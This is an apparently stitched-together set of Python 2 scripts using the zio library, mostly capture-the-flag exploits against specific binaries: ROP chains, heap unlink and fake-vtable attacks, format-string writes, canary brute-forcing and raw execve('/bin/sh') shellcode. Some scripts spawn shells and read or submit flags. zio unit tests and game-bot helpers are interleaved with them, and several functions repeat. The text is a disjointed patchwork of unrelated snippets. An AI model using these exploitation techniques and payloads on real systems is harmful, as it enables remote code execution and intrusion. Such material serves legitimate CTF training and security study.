    #write_16byte(io, 0x600858, l64(0x6ffffff0)+l64(0x3d57d6))
    for i in range(0, len(fake_relro), 8):
        write_16byte(io, 0x601058 + i, fake_relro[i:i + 8] + '\x00' * 8)
    for i in range(0, len(fake_sym), 8):
        write_16byte(io, 0x601078 + i, fake_sym[i:i + 8] + '\x00' * 8)
    write_16byte(io, 0x601098, 'system'.ljust(16, '\x00'))
    write_16byte(io, 0x601a50, '/bin/sh'.ljust(16, '\x00'))
    plt0 = 0x400420
    rop = l64(pop_rdi_ret) + l64(0x601a50)
    index = 0x155dc
    rop += l64(plt0) + l64(index)
    for i in range(0, len(rop), 8):
        write_16byte(io, 0x601980 + i, rop[i:i + 8] + '\x00' * 8)
    stack_povit = 'a' * 0x10 + l64(0x601980 - 0x8) + l64(leave_ret)
    io.write(stack_povit)
    interact(io)
def exp(target):
    """Plant system@plt and a 'sh' string pointer via write_dword, poke two bytes, then interact.

    The offsets (0x2c and 0x2c+8) and the meaning of write_byte(io, 1, 1)
    are target-specific and defined by the sibling helpers, not here.
    """
    session = zio(target, timeout=10000,
                  print_read=COLORED(RAW, 'red'),
                  print_write=COLORED(RAW, 'green'))
    sh_addr = 0x804828e
    system_addr = 0x080483E0
    for offset, value in ((0x2c, system_addr), (0x2c + 8, sh_addr)):
        write_dword(session, offset, value)
    for _ in range(2):
        write_byte(session, 1, 1)
    session.interact()
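def exp(s):
    """Feed `s` to a fresh ./tlc at its first ':' prompt and consume the reply line.

    The reply after the second ':' is read and discarded; only driving the
    program matters here. Read errors after the send (EOF/timeout) are
    swallowed as in the original, but the exception is no longer a bare
    except and the child is always closed.
    """
    io = zio('./tlc')
    try:
        io.read_until(':')
        io.writeline(s)
        try:
            io.read_until(':')
            io.readline()
        except Exception:
            pass
    finally:
        io.close()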
def attack(host='127.0.0.1', port=1234, shell=False):
    """Run the exploit (start()) against `host`:`port` and return either the session or the flag.

    When `host` equals the module-level `local`, the local binary is spawned
    with REPR echoing and start() is told debug=1; otherwise a silent TCP
    session is used with debug=0. With shell=True the live session is
    returned; otherwise the module-level `cmd` is sent and its first output
    line (stripped) is returned after closing the session.
    """
    is_local = host == local
    if is_local:
        io = zio(local, print_read=COLORED(REPR, 'yellow'),
                 print_write=COLORED(REPR, 'blue'))
    else:
        io = zio((host, port), print_read=False, print_write=False)
    start(io, 1 if is_local else 0)
    if shell:
        return io
    io.write(cmd + '\n')
    flag = io.readline().strip()
    io.close()
    return flag
def exp(target):
    """Heap exploit over login/add_req/del_req/change_req/print_req/menu: leak, corrupt, run shellcode.

    Seven requests are created and 1/3/5 freed; overflowing request 0 with
    0x47 bytes makes print_req leak the following 8 bytes, from which
    heap_base is derived (leak - 0xe0). Requests 0/2/4 are then rewritten
    with fake fd/bk pairs (atoi_got-0x18 and 0x609E80 — unlink-style) and
    request 6 receives a raw x86-64 shellcode blob (not decoded here).
    payload2 is a tiny stub (0x68 = push, 0xc3 = ret) presumably used to
    redirect execution to heap_base+0x1b0; two more add_req calls and a
    menu(1) trigger it. `sc_addr` is unused.
    """
    io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), \
             print_write=COLORED(RAW, 'green'))
    login(io)
    add_req(io, '11111111')
    add_req(io, '22222222')
    add_req(io, '33333333')
    add_req(io, '44444444')
    add_req(io, '55555555')
    add_req(io, '66666666')
    add_req(io, '77777777')
    del_req(io, 1)
    del_req(io, 3)
    del_req(io, 5)
    #leak
    change_req(io, 0, 'a'*0x47)
    print_req(io)
    io.read_until('a'*0x47+'\n')
    leak_value = l64(io.readline()[:-1].ljust(8, '\x00'))
    print hex(leak_value)
    heap_base = leak_value - 0xe0
    atoi_got = 0x00000000006099D8
    payload = l64(atoi_got-0x18)*8
    change_req(io, 0, payload + l64(0x0000000000609E80)+l64(0x0000000000609E80))
    change_req(io, 2, 'b'*0x40 + l64(0x0000000000609E80)+l64(0x0000000000609E80))
    change_req(io, 4, 'c'*0x40 + l64(0x0000000000609E80)+l64(0x0000000000609E80))
    buf = ""
    buf += "\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d\x05"
    buf += "\xef\xff\xff\xff\x48\xbb\xaa\xfb\x07\x50\x07\x4b\x98"
    buf += "\xc5\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
    buf += "\xc0\xc0\x5f\xc9\x4f\xf0\xb7\xa7\xc3\x95\x28\x23\x6f"
    buf += "\x4b\xcb\x8d\x23\x1c\x6f\x7d\x64\x4b\x98\x8d\x23\x1d"
    buf += "\x55\xb8\x0f\x4b\x98\xc5\x85\x99\x6e\x3e\x28\x38\xf0"
    buf += "\xc5\xfc\xac\x4f\xd9\xe1\x44\x9d\xc5"
    change_req(io, 6, buf)
    #change_req(io, 2, 'b'*0x50)
    #io.gdb_hint()
    sc_addr = 0x6161616161616161 # shellcode64
    add_req(io, '88888')
    payload2 = '\x68'+l64(heap_base+0x1b0)+'\xc3'
    payload2 = payload2.ljust(0x10, 'a')
    change_req(io, 3, payload2+l64(heap_base+0x30)+l64(heap_base+0x60))
    add_req(io, '99999')
    menu(io, 1)
    interact(io)
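def connect():
    """Connect to the challenge, solve its SHA1 proof-of-work, and return the session.

    The banner line looks like 'SHA(<regex>) = <hexdigest>'. Every string
    the regex can generate (exrex.generate) is hashed until one matches the
    digest, and that string is sent back. Raises RuntimeError (after closing
    the socket) if the regex space is exhausted without a match, instead of
    hanging on the following read_until as the original did.
    """
    io = zio(('119.254.101.232', 8888))
    banner = io.read_until('\n')
    regex = re.compile(r'SHA\((.*?)\) = ([\d\w]+)')
    _reg, _hash = regex.findall(banner)[0]
    for candidate in exrex.generate(_reg):
        if sha1(candidate).hexdigest() == _hash:
            io.write(candidate + '\n')
            break
    else:
        io.close()
        raise RuntimeError('no string matching %r hashes to %s' % (_reg, _hash))
    io.read_until('your answer\n')
    return io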
def exp(target):
    """C++ heap exploit (add_tv/add_movie/remove_entry/show_all): vtable-based leak, then fake vtable.

    Three tv entries are allocated and removed by name so that a following
    add_movie with a crafted 0x100+ byte description reoccupies them; the
    description starts with the movie vtable pointer and ends with a pointer
    field (malloc@GOT, later db_addr), which show_all() then dereferences
    and prints — yielding malloc's address and a heap address. addr2 is the
    libc-relative target address (local offsets active, remote commented
    out). The final add_movie passes that address as the name and points
    the object at a fake vtable inside the heap; menu choice '4' triggers
    the virtual call. The inline addresses are the author's notes.
    """
    io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green'))
    add_tv(io, 'aaa', 100, 200, 'bbbb') #0x602010
    add_tv(io, 'aaa', 100, 200, 'bbbb') #0x6020f0
    add_tv(io, 'aaa', 100, 200, 'bbbb') #0x6021d0
    remove_entry(io, 'aaa')
    malloc_got = 0x0000000000601C58
    db_addr = 0x601dc0
    movie_vt = 0x00000000004015b0
    payload = l64(movie_vt) + 'a' * 8 + '\x00' * 56 + 'b' * 8 + '\x00' * (
        0x80 - 8) + l64(0x0000006443480000) + l64(malloc_got)
    print len(payload)
    add_movie(io, 'ccc', payload, 300, 'eeee') #0x602010 0x602110
    add_tv(io, 'hhh', 100, 200, 'bbbb') #0x6021e0
    add_tv(io, 'hhh', 100, 200, 'bbbb') #0x6022c0
    add_tv(io, 'hhh', 100, 200, 'bbbb') #0x6023a0
    remove_entry(io, 'hhh')
    payload = l64(movie_vt) + 'a' * 8 + '\x00' * 56 + 'b' * 8 + '\x00' * (
        0x80 - 8) + l64(0x0000006443480000) + l64(db_addr)
    add_movie(io, 'ccc', payload, 300, 'eeee')
    malloc_addr, heap_addr = show_all(io)
    io.gdb_hint()
    add_tv(io, 'jjj', 100, 200, 'bbbb') #0x6023b0
    add_tv(io, 'jjj', 100, 200, 'bbbb') #0x602490
    add_tv(io, 'jjj', 100, 200, 'bbbb') #0x6023a0
    remove_entry(io, 'jjj')
    #local
    addr2 = malloc_addr - 0x00007FFFF7277750 + 0x00007FFFF723B52C
    #remote
    #addr2 = malloc_addr - 0x0000000000082750 + 0x000000000004652c
    # fake vtable lives 8 bytes into the chunk that was at 0x6023b0 locally,
    # rebased onto the leaked heap address
    fake_vt = 0x6023b0 + 8 - 0x602010 + heap_addr
    payload = l64(fake_vt) + '/bin/sh;' + '\x00' * 56 + 'b' * 8 + '\x00' * (
        0x80 - 8) + l64(0x0000006443480000) + l64(db_addr)
    print len(payload)
    add_movie(io, l64(addr2), payload, 300, 'eeee')
    io.writeline('4')
    io.interact()
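def leak_got(offset):
    """Return the 8-byte value found at base+offset, read through the stack-overflow ROP chain.

    Uses the module-level `host`, `stack_cookie`, `saved_rbp` and `base`.
    The overflow is 8200 bytes of padding, then the canary and saved rbp are
    restored before entering the gadget at base+0xec6 with a register block
    that ends with base+offset, 4 and base+0xeb0; the gadget semantics are
    not visible here, but the reply after 'thanks.\\n' is read as the leaked
    value and zero-padded on the right if fewer than 8 bytes arrive.
    The connection is closed on every path (the original leaked one per call).
    """
    io = zio((host, 1234), print_write=False, print_read=False, timeout=100000)
    try:
        rop = 'A' * 8200 + l64(stack_cookie) + l64(saved_rbp)
        rop += (l64(base + 0xec6) + 'A' * 8 + l64(5) + 'B' * 8
                + l64(base + 0x202018) + 'C' * 8 + l64(base + offset) + l64(4))
        rop += l64(base + 0xeb0)
        io.write(rop)
        io.read_until('thanks.\n')
        left = io.read(8)
    finally:
        io.close()
    return l64(left + '\x00' * (8 - len(left)))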
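def pwn(target, dis):
    """Try one candidate distance `dis` (system - atoi) against `target`.

    Flow as in the original: plant atoi_got-4 and 0x0804B1C0-8 through the
    dian_cai() overflows, read atoi's address back with link_heap(), then
    order with a quantity of atoi+dis (reinterpreted as a signed 32-bit
    int, which is evidently what the quantity field parses) so that the
    entry becomes `system`; finally send '/bin/sh'. If the session output
    contains "RCTF" or "No such file", the output plus the winning `dis` is
    written to the file 'flga-4002' and the process exits; otherwise the
    session is closed so the caller can try the next `dis`.
    Unused locals (read_got, offset_read, offset_puts) were removed.
    """
    io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green'))
    #io = zio(target, timeout=10000, print_read=None, print_write=None)
    input_info(io)
    dian_cai(io, 'aaa', 1)
    atoi_got = 0x0804B038
    payload = 'a' * 32 + l32(atoi_got - 4)
    dian_cai(io, payload, 2)
    atoi_addr = link_heap(io)
    payload2 = 'a' * 32 + l32(0x0804B1C0 - 8)
    dian_cai(io, payload2, 3)
    sublit(io)
    payload = 'a' * 4 + l32(atoi_got)
    offset_system = 0x0003e800
    offset_atoi = 0x0002fbb0
    print("dis: %s com: %s" % (hex(dis), hex(offset_system - offset_atoi)))
    system_addr = atoi_addr + dis
    # the quantity prompt takes a signed int; reinterpret so the textual
    # value round-trips to the same 32 bits
    system_addr = struct.unpack("i", l32(system_addr))[0]
    sublit(io)
    dian_cai(io, payload, system_addr)
    #io.writeline('/bin/cat /home/shaxian/flag')
    io.writeline('/bin/sh\n')
    io.interact()
    #data = io.read(1024)
    data = io.read_until_timeout(1)
    if "RCTF" in data or "No such file" in data:
        print("herre")
        data += "dis:" + hex(dis) + "com:" + hex(offset_system - offset_atoi)
        # context manager guarantees the result is flushed before exit(0)
        with open("flga-4002", 'w') as file_w:
            file_w.write(data)
        exit(0)
    else:
        io.close()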
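def test_attach_socket(self):
    """zio() must accept an already-connected socket and continue reading from it.

    A socat listener answers with a tiny HTTP response. The status line is
    consumed byte-wise on the raw socket, then the socket is handed to zio,
    which is expected to deliver the Content-Type header, the blank line
    and the body. Up to four random ports are tried.
    """
    print('')
    for _ in range(4):
        port = random.randint(31337, 65530)
        p = subprocess.Popen([
            'socat', 'TCP-LISTEN:%d,crlf' % port,
            'SYSTEM:"echo HTTP/1.0 200; echo Content-Type: text/plain; echo; echo Hello, zio;"'
        ])
        time.sleep(0.2)
        # returncode is None until poll()/wait(): the original's
        # `if p.returncode` could never detect a listener that failed to bind.
        if p.poll() is not None:
            continue
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect(('127.0.0.1', port))
            line = b''
            while True:
                c = s.recv(1)
                if not c:
                    break
                line += c
                if line.find(b'\n') > -1:
                    break
            assert line.rstrip() == b"HTTP/1.0 200", repr(line)
            io = zio(s)
            line = io.readline()
            self.assertEqual(line.rstrip(), b"Content-Type: text/plain", repr(line))
            line = io.readline()  # the empty line produced by "echo;"
            line = io.readline()
            self.assertEqual(line.rstrip(), b"Hello, zio", repr(line))
            io.end()
            io.close()
        except socket.error:
            # do not leave the listener running before retrying on a new port
            p.terminate()
            p.wait()
            continue
        p.terminate()
        for _ in range(10):
            r = p.poll()
            if r is not None:
                break
            time.sleep(0.2)
        else:
            try:
                p.kill()
            except OSError:  # process already gone
                pass
        break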
def exp(target):
    """Write system@plt and an 'sh' pointer at 0x2c / 0x2c+8, flip two bytes, then interact.

    What the offsets and write_byte(io, 1, 1) mean is defined by the sibling
    write_dword/write_byte helpers for this target.
    """
    session = zio(target, timeout=10000,
                  print_read=COLORED(RAW, 'red'),
                  print_write=COLORED(RAW, 'green'))
    system_addr, sh_addr = 0x080483E0, 0x804828e
    write_dword(session, 0x2c, system_addr)
    write_dword(session, 0x2c + 8, sh_addr)
    write_byte(session, 1, 1)
    write_byte(session, 1, 1)
    session.interact()
def dump_libc(write_addr, size):
    """Dump `size` bytes starting at `write_addr` through the stack-overflow ROP chain.

    Uses the module-level `host`, `stack_cookie`, `saved_rbp`, `base` and
    `libc_base`. The overflow buffer starts with write_addr itself (so it
    sits at a known stack slot), is padded to 8200 bytes, then restores the
    canary and saved rbp before entering the gadget at base+0xec6 with a
    register block (0, saved_rbp-0x70-0x2000, size, libc_base, 4) and
    base+0xeb0; the gadget semantics are not visible here. Everything
    received after 'thanks.\\n' is returned raw; the connection is closed.
    """
    io = zio((host, 1234), print_write = False, print_read = False, timeout = 100000)
    rop = l64(write_addr) + 'A' * (8200 - 8) + l64(stack_cookie) + l64(saved_rbp)
    rop += l64(base + 0xec6) + 'A' * 8 + l64(0) + 'B' * 8 + l64(saved_rbp - 0x70 - 0x2000) + l64(size) + l64(libc_base) + l64(4)
    rop += l64(base + 0xeb0)
    io.write(rop)
    io.read_until('thanks.\n')
    left = io.read()
    io.close()
    return left
def exp(target):
    """Store/item overflow: redirect a GOT entry, leak atoi with puts, then ret2system.

    Relies on module-level `payload`, `addr_blackberry`, `got_stack_fail`,
    `addr_puts`, `addr_store_cmd`, `got_atoi`, `offset_atoi`,
    `offset_system` and `offset_bin`. Fifteen items are added; the first
    and last carry `payload` (the 15th also plants 0x08049b74). The 'b'
    menu path then uses a negative index (addr_blackberry - length) to
    reach got_stack_fail — presumably rewriting a GOT entry so the later
    overflow is not aborted — and the 'c'/'a' path overflows 32 bytes into
    a return to puts(atoi@GOT) -> store_cmd, from which the real atoi is
    read and system('/bin/sh') addresses derived for the second overflow.
    """
    io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green'))
    store_name='name'*15+'xxx'
    item_name='a'*31
    description='b'*79
    create_store(io,store_name,item_name,description)
    length=len('Blackberry OS Phone Z price: -2147483648 CNY description: ')
    generate(io)
    for x in xrange(15):
        if x == 0:
            item_name=payload+'a'*(31-len(payload))
            description = payload+'Z'*(79-len(payload))
        if x == 14:
            description=payload+'Z'*(74-len(payload))+l32(0x08049b74)+'Z'
        add_item(io,item_name,description)
    generate(io)
    # overwrite the GOT entry
    io.read_until('? ')
    io.writeline('b')
    io.read_until('? ')
    io.writeline('2')
    io.read_until('? ')
    io.writeline('b')
    io.read_until('? ')
    io.gdb_hint()
    io.writeline(str(addr_blackberry-length))
    io.read_until('? ')
    io.writeline('b')
    io.read_until("? ")
    io.writeline(str(got_stack_fail))
    # stack overflow
    io.read_until('? ')
    io.writeline('c')
    io.read_until('? ')
    io.writeline('a')
    payload2='d'*32+l32(addr_puts)+l32(addr_store_cmd)+l32(got_atoi)
    io.read_until('? ')
    io.writeline(payload2)
    io.read_until('Long.\n')
    data=io.read(4)
    print 'data:%s'%data
    io.read_until('? ')
    real_atoi=l32(data)
    print hex(real_atoi)
    # bin/sh
    real_system=real_atoi-offset_atoi+offset_system
    real_bin=real_atoi-offset_atoi+offset_bin
    payload3='d'*32+l32(real_system)+'1234'+l32(real_bin)
    io.writeline(payload3)
    io.read_until('Long.\n')
    io.interact()
def exp3(target):
    """Store shellcode with add() and trigger it through a raw command, then read and submit the flag.

    The payload is an x86-64 shellcode (it embeds '/bin///s' and ends with
    the syscall bytes \\x0f\\x05). add(io, 0x3eeb, 1, payload) stores it;
    the raw l32(0xdeadfafa) + l8(index) message is the service's command
    framing (index 16, derived from a 0x203020-based table), which
    presumably dispatches into the stored buffer. Python 2 integer division
    is relied on for `index`.
    """
    io = zio(target, timeout=30, print_read=COLORED(RAW, 'red'), \
             print_write=COLORED(RAW, 'green'))
    payload = 'hri\x01\x01\x814$\x01\x01\x01\x011\xd2Rj\x08ZH\x01\xe2RH\x89\xe2jhH\xb8/bin///sPj;XH\x89\xe7H\x89\xd6\x99\x0f\x05'
    add(io, 0x3eeb, 1, payload)
    index = (0x2030a0 - 0x203020) / 8
    payload = l32(0xdeadfafa) + l8(index)
    io.write(payload)
    io.writeline('./bin/cat flag/flag')
    flag = io.readline()[:-1].strip()
    print target
    print 'flag', flag
    submit_flag(flag)
    io.close()
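def a_byte(num):
    """Brute-force the next byte of the module-level `payload` against (ip, 1234).

    For each candidate 0..255 a new connection is opened, payload+byte is
    sent, and the line after 'thanks.' (plus one skipped line) is inspected:
    a non-empty reply means the guess kept the process alive, so the byte
    is appended to `payload` and its my_hex() form is returned. `num` is
    only referenced by the commented-out log label. Returns None if no
    byte produced a reply. Each connection is closed (the original left
    all 256 open).
    """
    global payload
    for address in range(256):
        io = zio((ip, 1234), timeout=100000, print_read=REPR, print_write=COLORED(REPR))
        try:
            io.write(payload + chr(address))
            io.read_until('thanks.')
            io.readline()
            data = io.readline()
        finally:
            io.close()
        if data != '':
            payload += chr(address)
            result = my_hex(address)
            #log("address_"+ str(num) + ": " + result, 'red')
            return result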
def exp(target):
    """Overflow item 1 into item 2's cleanup pointer and fire it with shellcode in the buffer.

    Two items are created; editing item 1 with an over-long value writes
    past it and replaces the low three bytes of the second node's cleanup
    pointer with 0x6016c2 (a spot inside the input buffer at buf_addr).
    Menu option 4 then deletes item 2: the input '2\\x00' selects it while
    the bytes after the NUL land in the buffer, so the cleanup call jumps
    into the execve('/bin/sh') shellcode. Ends in interact().
    """
    io = zio(target, timeout=10000, print_read=COLORED(REPR, 'red'), print_write=COLORED(REPR, 'green'))
    add_item(io, '123', '111')
    add_item(io, '124', '112')
    buf_addr = 0x6016c0 # point to the address of buffer
    edit_item(io, 1, '222', '2'*0x10 + '3'*0x10 + '\xc2\x16\x60')# overwrite the second node's cleanup pointer
    # http://shell-storm.org/shellcode/files/shellcode-806.php
    shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
    io.read_until('Quit\n')
    io.writeline('4')
    io.read_until(':')
    io.writeline('2\x00' + shellcode)# trigger the second node's cleanup and place the shellcode in the buffer
    io.interact()
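def test_tty_raw_out(self):
    """stdout=TTY_RAW must deliver CR/LF and non-printable bytes exactly as the child wrote them.

    First a printf with randomly mixed '\\r\\n'/'\\n' endings; then ten runs
    of myprintf.py echoing every non-printable byte in shuffled order.
    Every child is closed after its output has been read (the original
    never closed the ten helper runs).
    """
    escaped = []
    expected = []
    for i in range(10):
        crlf = random.randint(0, 1)
        escaped.append('%d%s' % (i, crlf and '\\r\\n' or '\\n'))
        expected.append('%d%s' % (i, crlf and '\r\n' or '\n'))
    expected = ''.join(expected)
    io = zio("printf '" + ''.join(escaped) + "'", stdout=TTY_RAW)
    try:
        rd = io.read()
    finally:
        io.close()
    self.assertEqual(rd, expected)

    unprintable = [chr(c) for c in range(256) if chr(c) not in string.printable]
    from zio import which
    py = which('python2') or which('python')
    self.assertNotEqual(py, None)
    # NOTE(review): sys.argv[0] is the test runner when not run as a script;
    # os.path.dirname(__file__) would locate myprintf.py more reliably.
    helper = os.path.join(os.path.dirname(sys.argv[0]), 'myprintf.py')
    for _ in range(10):
        random.shuffle(unprintable)
        body = ''.join(unprintable)
        # repr() escapes the bytes; strip its quotes and wrap in a
        # single-quoted shell argument framed by \r\n ... \n
        arg = "'\\r\\n" + repr(body)[1:-1] + "\\n'"
        io = zio(' '.join([py, '-u', helper, arg]),
                 stdout=TTY_RAW, print_read=COLORED(REPR))
        try:
            rd = io.read()
        finally:
            io.close()
        self.assertEqual(rd, "\r\n" + body + "\n")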
def exp2(target):
    """Leak heap/binary/libc through freed rows, then patch a function pointer byte by byte.

    Three 8x20 tables are added and two freed; re-adding a smaller one lets
    show_row() read the stale freelist pointers, giving heap_base (row 1,
    -0x50) and the binary base (row 2, -0xb80). Freeing and re-adding
    again exposes an unsorted-bin pointer from which libc_base (-0x3c4b78)
    and system follow. `d` is a crafted row: '/bin/sh;' minus a constant,
    then the per-byte difference (carry ignored) between system and the
    pointer at main_base+0xcc0 — presumably because expand() adds rows
    byte-wise onto that pointer. Two add_row calls and a raw
    l32(0xdeadfafa) command (the service's framing) trigger it; the flag is
    then read and submitted.
    """
    io = zio(target, timeout=30, print_read=COLORED(RAW, 'red'), \
             print_write=COLORED(RAW, 'green'))
    add(io, 20, 8, 'a' * 0xa0)
    add(io, 20, 8, 'a' * 0xa0)
    add(io, 20, 8, 'a' * 0xa0)
    delete(io, 0)
    delete(io, 1)
    add(io, 7, 8, "")
    for i in range(7):
        print i, hex(l64(show_row(io, 0, i)))
    heap_base = l64(show_row(io, 0, 1)) - 0x50
    main_base = l64(show_row(io, 0, 2)) - 0xb80
    print hex(heap_base), hex(main_base)
    delete(io, 0)
    add(io, 20, 8, "")
    libc_base = (l64(show_row(io, 0, 0))) - 0x3c4b78
    print hex(libc_base)
    system = libc_base + 0x0000000000045390
    delete(io, 0)
    add(io, 18, 8, '')
    d1 = l64('/bin/sh;') - 0x0000000800000014
    d = l64(d1)
    # byte-wise (system - (main_base+0xcc0)) mod 256, no carry propagation
    for i in range(8):
        val = ord(l64(system)[i]) - ord(l64(main_base + 0xcc0)[i])
        if val < 0:
            val += 0x100
        d += chr(val)
    expand(io, 0, 0x20000002, d)
    add_row(io, 0, 22, 18)
    add_row(io, 0, 25, 19)
    payload = l32(0xdeadfafa) + l8(3) + l32(2) + l32(0)
    io.write(payload)
    io.writeline('./bin/cat flag/flag')
    flag = io.readline()[:-1].strip()
    print target
    print 'flag', flag
    submit_flag(flag)
    io.close()
def exp(target):
    """Format-string write of `value` to `addr` using a pointer-to-pointer chain on the stack.

    %17$p leaks a pointer (named argv0 by the author) and %49$p a second
    stack pointer (`path`), which is rounded up to 4 bytes; index3 is the
    positional index whose slot holds `path`. The first loop repoints the
    low byte of slot 17 at path+i and writes the i-th byte of `addr` there
    through %49$hhn, i.e. it assembles `addr` at `path`. The second loop
    then writes the bytes of `value` (0x41424344 — a test marker) through
    index3. do_fmt() performs one send/receive round; `%%` yields literal
    '%' in the format templates. Python 2 integer division is relied on.
    """
    # io = zio(target, timeout=10000, print_read=COLORED(REPR, 'red'), print_write=COLORED(REPR, 'green'))
    io = zio(target, timeout=10000, print_read=COLORED(RAW, "red"), print_write=COLORED(RAW, "green"))
    io.writeline("%17$p")
    argv0 = int(io.readline().strip("\n"), 16)
    io.writeline("%49$p")
    path = int(io.readline().strip("\n"), 16)
    print hex(path)
    path = (path + 3) / 4 * 4
    print hex(path)
    index3 = (path - argv0) / 4 + 49
    # not need
    io.writeline("%49$s")
    print HEX(io.readline().strip("\n"))
    # not need
    io.writeline("%%%d$p" % index3)
    io.readline()
    addr = 0x0804A01C
    value = 0x41424344
    for i in range(4):
        do_fmt(io, "%%%dc%%17$hhn" % ((path + i) & 0xFF))
        k = (addr >> (i * 8)) & 0xFF
        if k != 0:
            do_fmt(io, "%%%dc%%49$hhn" % k)
        else:
            # a zero byte needs no padding characters
            do_fmt(io, "%%49$hhn")
    do_fmt(io, "%%%dc%%17$hhn" % (path & 0xFF))
    for i in range(4):
        do_fmt(io, "%%%dc%%49$hhn" % ((addr + i) & 0xFF))
        k = (value >> (i * 8)) & 0xFF
        if k != 0:
            do_fmt(io, "%%%dc%%%d$hhn" % (k, index3))
        else:
            do_fmt(io, "%%%d$hhn" % index3)
    io.gdb_hint()
    io.interact()
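def test_attach_socket(self):
    """zio() must wrap an already-connected socket and keep reading where the caller left off.

    A socat listener serves a tiny HTTP reply; the status line is read byte
    by byte on the raw socket, then zio(s) must yield the Content-Type line,
    the blank line and 'Hello, zio'. Up to four random ports are tried.
    """
    print('')
    for _ in range(4):
        port = random.randint(31337, 65530)
        p = subprocess.Popen(['socat', 'TCP-LISTEN:%d,crlf' % port,
                              'SYSTEM:"echo HTTP/1.0 200; echo Content-Type\: text/plain; echo; echo Hello, zio;"'])
        time.sleep(0.2)
        # the original tested p.returncode without poll(), which never fires
        if p.poll() is not None:
            continue
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect(('127.0.0.1', port))
            line = ''
            while True:
                c = s.recv(1)
                if not c:
                    break
                line += c
                if line.find('\n') > -1:
                    break
            assert line.rstrip() == "HTTP/1.0 200", repr(line)
            io = zio(s)
            line = io.readline()
            self.assertEqual(line.rstrip(), "Content-Type: text/plain", repr(line))
            line = io.readline()  # blank line from "echo;"
            line = io.readline()
            self.assertEqual(line.rstrip(), "Hello, zio", repr(line))
            io.end()
            io.close()
        except socket.error:
            p.terminate()
            p.wait()
            continue
        p.terminate()
        for _ in range(10):
            r = p.poll()
            if r is not None:
                break
            time.sleep(0.2)
        else:
            try:
                p.kill()
            except OSError:  # already exited between poll() and kill()
                pass
        break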
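def a_byte(num):
    """Brute-force the next byte of the module-level `payload` against (ip, port).

    Each candidate byte opens a fresh connection, walks the menu ('>' ->
    '4', then the '(y/n) ' prompt) and sends payload+byte. If a second
    reply line arrives before the 3s timeout and is non-empty the guess is
    accepted: it is appended to `payload` and my_hex(byte) returned. A
    TIMEOUT on the reply means a wrong guess and the next byte is tried;
    timeouts on the menu navigation propagate, as in the original. `num`
    is unused. Returns None when all 256 candidates failed. The connection
    is closed on every path (the original only closed on timeout).
    """
    global payload
    for address in range(256):
        io = zio((ip, port), timeout=3, print_write=COLORED(REPR))
        try:
            time.sleep(2)
            io.read_until('>')
            io.write('4')
            io.read_until('(y/n) ')
            io.write(payload + chr(address))
            try:
                io.readline()
                data = io.readline()
            except TIMEOUT:
                continue
        finally:
            io.close()
        if data != '':
            payload += chr(address)
            return my_hex(address)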
from zio import *
import random

# Card-game challenge on pwnable.kr:9009. The session is opened at import
# time and driven through the "(Y/N)" and first "Choice: " prompts.
target = ("pwnable.kr", 9009)
io = zio(target, timeout = 9999)
io.read_until("(Y/N)\n")
io.write("Y\n")
io.read_until("Choice: ")
io.write("1\n")

def read_timeout(io, timeout = 9999):
    """Call io.read_timeout(timeout) until it returns only whitespace/empty, and return that.

    NOTE(review): every non-empty chunk is discarded, so this returns only
    once the stream goes quiet — it acts as a drain, not a reader. Confirm
    that is the intent before using the return value for anything.
    """
    while True:
        data = io.read_timeout(timeout)
        if data.strip() != '':
            continue
        else:
            return data

def get_status(data):
    """Parse "Your Total is N" and "The Dealer Has a Total of M" out of `data`.

    Returns (my_value, dealer_value) as ints. If a phrase is missing,
    find() returns -1 and the resulting slice will most likely not parse,
    raising ValueError.
    """
    pos_s = data.find("Your Total is ") + len("Your Total is ")
    pos_e = data.find("\n", pos_s)
    my_value = int(data[pos_s:pos_e])
    pos_s = data.find("The Dealer Has a Total of ") + len("The Dealer Has a Total of ")
    pos_e = data.find("\n", pos_s)
    dealer_value = int(data[pos_s:pos_e])
    return my_value, dealer_value
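def get_io(target):
    """Open a zio session to ``target`` with a very long (9999 s) timeout.

    Traffic echoing is off.  The two COLORED(...) modes the original built
    and never used are dropped; to watch the exchange, pass
    ``print_read=COLORED(RAW, "green"), print_write=COLORED(RAW, "blue")``.
    """
    return zio(target, timeout = 9999)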
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
'''
Created on 2014-11-29

@author: yf

Helper state for the ./qoobee4 rock/paper/scissors challenge.  The remote
(host, port) target is left commented out; the local binary is used.
'''
from zio import *
import re
import time

io = zio('./qoobee4')#, print_write=False, print_read=False)
# io = zio(('10.11.12.13',1415), print_write=False, print_read=False)

# Move tables indexed by the game's choice number (order is what the game
# expects; purpose inferred from the names).
lose_dic = ['scissor','rock','paper']
right_dic = ['paper', 'scissor','rock']
# Candidate values to probe -- kept verbatim, including the repeated 35.
divset = [17, 16, 18, 19, 21, 22,23,24,25,26,27,28,29,30, 32 , 33 , 34 , 35 , 35 , 36 , 37 , 38 , 39 , 40]
rightset = []
flag = ''


def losenum(modnum):
    """Return ``(modnum - 1) mod 3``, i.e. the choice one step below ``modnum``."""
    return (modnum + 2) % 3

# Disabled probe loop from the original, kept for reference:
# def testdiv(modnum):
#     while True:
#         io.read_until('Your Choice: ')
#         io.writeline('7')
#         io.read_until('Select one:')
#         io.writeline('%d' % losenum(modnum))
#         io.read_until('number(0-100)? ')
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from zio import *

# Remote target.  The original first assigned ip = '210.61.8.96' and then
# immediately replaced it with the address below.
ip = '10.211.55.48'
port = 51342
io = zio((ip, port), timeout = 1000, print_write = COLORED(REPR))

# Addresses from the 32-bit binary.  The names suggest PLT stubs, a string
# holding the flag path, a writable buffer and three gadgets.
open_plt = 0x8048420
flag = 0x80487D0
read_plt = 0x80483E0
buf = 0x0804A0A1
write_plt = 0x8048450
read_80_bytes = 0x804865C
gadget1 = 0x804879E
gadget2 = 0x804879D
